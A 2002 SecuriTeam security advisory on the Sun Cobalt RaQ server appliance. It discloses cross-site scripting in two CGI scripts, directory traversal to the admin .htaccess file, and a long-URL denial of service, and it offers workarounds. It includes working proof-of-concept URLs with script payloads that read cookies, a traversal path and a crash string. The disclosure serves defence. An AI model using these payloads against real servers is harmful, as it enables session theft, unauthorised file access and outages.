[UNIX] Cobalt RaQ Cross Site Scripting, Directory Traversal and DoS Vulnerabilities

From: support@securiteam.com
Date: 03/02/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  2 Mar 2002 19:16:09 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cobalt RaQ Cross Site Scripting, Directory Traversal and DoS
Vulnerabilities
------------------------------------------------------------------------

SUMMARY

The Sun Cobalt RaQ is a server appliance for Internet Service Providers
(ISPs). It can host up to 200 individual websites or it can be dedicated
to a single medium or large customer.
Multiple security vulnerabilities have been found in the product, and
though the vulnerabilities require a valid account on the Cobalt machine,
they are dangerous nonetheless.

DETAILS

Cross site scripting:
Cobalt's service.cgi incorrectly handles the incoming search parses,
incoming HTML tags or JavaScript will be included inside the result
without them being filtered out for dangerous content.

Affected CGIs:
alert.cgi
service.cgi

Workaround:
1) Delete service.cgi from the system, or disable it from execution.
2) Delete alert.cgi from the system, or disable it from execution

Example:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>Hello!</h1><script>alert('hello')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>alert('Microsoft%20hole')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=)>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>alert(document.cookie)</script>

Location:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E

Cookies:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Tag images:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=)>

Write document:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>document.write(document.domain)</SCRIPT>

Directory traversal:
A directory traversal vulnerability exists by default in the CGI:
"/usr/admserv/html/.cobalt/admin". The CGI would allow you to access any
restricted files.

Example:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

Denial of service:
The server crashes when it receives a very long URL.

Example:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com>
Alex Hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Facto System CMS Contains Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... and can use Microsoft Access or SQL Server as a database backend. ... Multiple SQL injection vulnerabilities exist in the Facto System Content ...
    (Securiteam)
  • [NT] FreeProxy/FreeWeb Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... single computer and enables many computers to share an internet ... vulnerabilities in the product exist, ...
    (Securiteam)
  • [NEWS] SpiDynamics WebInspect Keeps Track of Its Users (Trial License)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WebInspect, S.P.I. Dynamic's premier product, is a network-based web ... We make no effort to hide that this remote authentication is done. ...
    (Securiteam)
  • [NT] DoS and Directory Traversal Vulnerabilities in WebServer 4 Everyone
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... requests and to allow attackers to download files that reside the outside ...
    (Securiteam)
  • [UNIX] Multiple Security Issues in Geeklog (XSS, SQL Inject)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... the vulnerabilities would allow a remote attacker to ... SQL Injection: ...
    (Securiteam)